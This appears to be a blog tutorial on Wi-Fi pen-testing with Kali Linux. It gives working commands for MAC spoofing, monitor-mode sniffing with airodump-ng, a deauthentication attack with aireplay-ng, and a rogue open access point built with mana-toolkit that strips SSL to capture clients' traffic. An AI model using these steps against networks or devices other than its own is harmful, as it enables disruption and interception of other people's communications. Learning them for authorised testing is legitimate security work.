Hacking your Home: Pen-testing Your Local Network
Everyone knows how important security is. However, many of us always think that only big companies should be concerned about security and that an attack could never happen to us. Unfortunately, that couldn’t be further from the truth. Security is just as important for large companies as it is for home networks . If you have internet at home, that means you have one or more wireless routers that may be exploited if not properly secured. That is why it is important to know how to perform pen-testing. A pen-test, or penetration test, is an attempt to evaluate the security of an IT infrastructure by safely trying to exploit vulnerabilities. Let’s go over how we can utilize pen-testing to make our home network more secure.
Things you need to install to follow along:
VirtualBox, Kali Linux, USB Wireless (Wi-Fi) Adapter, Terminator Terminal
Sniffing Packets in Monitor Mode
A network is a number of devices connected together. It is used to transfer data or share resources between connected devices. All networks (Wi-Fi or wired) achieve this using the same principle that one device acts as a server. The server contains the data that is shared between the connected devices. In most Wi-Fi networks, the server is the router, and the shared data is the Internet. Each network card has a physical static address assigned by the card manufacturer called MAC address (Media Access Control). This address is used by devices to identify each other and to transfer packets to the right place. Each packet has a source MAC and a destination MAC. You can change your MAC address value that is stored in the memory using a program called macchanger. In my case the Wi-Fi card is wlan0.
root@kali:~# macchanger --random wlan0Current MAC: 69:c7:df:5a:f5:78 (unknown)Permanent MAC: 69:c7:df:5a:f5:78 (unknown)New MAC: aa:44:69:81:36:5a (unknown)
Hackers can only receive packets that are sent to our MAC address, but this only applies to the default mode of your wireless card, which is managed mode. However, there is a mode that allows us to capture all the packets in our Wi-Fi range, not only the ones sent to our device. To achieve this, run the following commands to switch to monitor mode.
root@kali:~# iwconfig wlan0wlan0 IEEE 802.11 ESSID:off/anyMode: Managed Access Point: Not-Associated Tx-Power=18 dBmRetry short limit:7 RTS thr:off Fragment thr:offEncryption key:offPower Management:off// the following commands will change the moderoot@kali:~# ifconfig wlan0 downroot@kali:~# iwconfig wlan0 mode monitorroot@kali:~# ifconfig wlan0 up
If you followed these steps you should be able to run wlan0 and see that the mode has been changed to monitor.
root@kali:~# iwconfig wlan0wlan0 IEEE 802.11 Mode:Monitor Frequency:2.412 GHz Tx- Power=18 dBmRetry short limit:7 RTS thr:off Fragment thr:offPower Management:off
Now, you are ready to sniff some packets. The most important information you can gather with packet sniffing is MAC addresses of surrounding networks and encryption algorithm details used by each router. We are going to use Airodump-ng. It is a program that is a part of the aircrack-ng package. It’s a packet sniffer that allows you to capture all the packets that are in range of your Wi-Fi card. You can also use it to scan all Wi-Fi networks around you and gather information about them.
root@kali:~# airodump-ng wlan0Airodump-ng can also be used for targeted packet sniffing. You can launch airodump-ng on a specific target. You can also add a file name to write all the data to file by adding — write filename after the channel. You can then analyze this data using wireshark. Though, there might be a problem that the collected data will not be useful if the target network uses encryption.
root@kali:~# airodump-ng --bssid 84:1B:5E:CF:B6:D2 --channel 11 wlan0
After checking data for a particular network using its MAC address, you can use a de-authentication attack to disconnect any particular device from that network. In other words, this attack is used to disconnect any device from any network within your range even if the network is protected with a key. An attacker sends de-authentication packets to the router pretending to be the target machine (by spoofing its MAC address). At the same time, the attacker sends packets to the target machine (pretending to be the router) telling it that it needs to re-authenticate itself. I have used my network connection to successfully shutdown the Wi-Fi connection on my iPhone for one thousand packets.
root@kali:~# aireplay-ng --deauth 1000 -a 00:05:F9:45:D9:75 -c 56:F9:46:00:32:99 wlan014:09:50 Waiting for beacon frame (BSSID: 00:05:F9:45:D9:75) on channel 3614:09:58 Sending 64 directed DeAuth. STMAC: [56:F9:46:00:32:99] [ 2|24 ACKs]14:09:58 Sending 64 directed DeAuth. STMAC: [56:F9:46:00:32:99] [ 2|26 ACKs]14:09:59 Sending 64 directed DeAuth. STMAC: [56:F9:46:00:32:99] [ 1|16 ACKs]14:10:17 Sending 64 directed DeAuth. STMAC: [56:F9:46:00:32:99] [ 0|64 ACKs]14:10:18 Sending 64 directed DeAuth. STMAC: [56:F9:46:00:32:99] [ 0|64 ACKs]14:10:18 Sending 64 directed DeAuth. STMAC: [56:F9:46:00:32:99] [ 0|64 ACKs]14:10:19 Sending 64 directed DeAuth. STMAC: [56:F9:46:00:32:99] [ 0|63 ACKs]14:10:20 Sending 64 directed DeAuth. STMAC: [56:F9:46:00:32:99] [ 0|64 ACKs]14:10:20 Sending 64 directed DeAuth. STMAC: [56:F9:46:00:32:99] [ 0|64 ACKs]14:14:09 Sending 64 directed write failed: Network is down9:99] [ 0|38 ACKs]wi_write(): Network is downroot@kali:~# ding 64 directed DeAuth. STMAC: [56:F9:46:00:32:99] [ 0|50 ACKs]
Creating a Honeypot
Lastly, let’s create a fake access point (honeypot). Fake access points can be handy in many scenarios; one example is creating an open Access Point, this will attract a lot of clients, many of which will automatically connect to it. Then you can sniff all the traffic created by the clients that connect to it, and since it’s open, the traffic will not be encrypted. In order to do this, you need two cards: one connected to the internet and a Wi-Fi card to broadcast as an access point. Clients now send requests to the attackers Wi-Fi card. The attacker sets up his machine so that every request coming from the Wi-Fi card is forwarded to the second card that’s connected to the internet. The response comes back from the second card, through the attacker’s machine to the Wi-Fi card which forwards it to the client that initially requested it.
For a simple way to create a fake access point, we can utilize Mana-Toolkit. It automatically creates a new access point and starts sslstrip/firelamp and even attempts to bypass HSTS which is used by Gmail and Facebook. In order to be able to create a fake access point, install mana-toolkit by using the following command: apt-get install mana-toolkit. Next, open the following files hostapd-mana.conf and start-nat-simple.sh in leafpad to make sure that interface name matches with yours; in my case it is wlan0. If it is not the same you might need to change it in the following file hostapd-mana.conf to match your interface name.
root@kali:~# leafpad /etc/mana-toolkit/hostapd-mana.conf#A full description of options is available in https://github.com/sensepost/hostapd-mana/blob/master/hostapd/hostapd.confinterface=wlan0bssid=00:11:22:33:44:00driver=nl80211ssid=Internetchannel=6root@kali:~# leafpad /usr/share/mana-toolkit/run-mana/start-nat-simple.shroot@kali:~# bash /usr/share/mana-toolkit/run-mana/start-nat-simple.shConfiguration file: /etc/mana-toolkit/hostapd-mana.confUsing interface wlan0 with hwaddr 00:11:22:33:44:00 and ssid "Internet"wlan0: interface state UNINITIALIZED->ENABLEDwlan0: AP-ENABLEDHit enter to kill me
You are ready to connect your device. Try connecting your cell phone to it and you should see similar information.
wlan0: STA 56:F9:46:00:32:99 IEEE 802.11: associated // iPhone onewlan0: AP-STA-CONNECTED 56:F9:46:00:32:99wlan0: STA 76:73:0a:6d:96:24 IEEE 802.11: associated // iPhone twowlan0: AP-STA-CONNECTED 76:73:0a:6d:96:24wlan0: STA 76:73:0a:6d:96:24 IEEE 802.11: disassociatedwlan0: AP-STA-DISCONNECTED 76:73:0a:6d:96:24
Congratulations, you have successfully created a fake access point with the name “Internet” and connected another device to it.
On the whole, it is useful to perform packet sniffing and to create honeypots even for your home network because it can inform you if your network is vulnerable. Packet sniffing can reveal encryption algorithms used by your network, while honeypots can detect not only if there is an attack but also who is trying to hack into your home network. Although Honeypots can attract attackers which is helpful for white hats to detect attacks, black hats can use packet sniffing to spoof MAC addresses and access many systems in range, even encrypted ones.
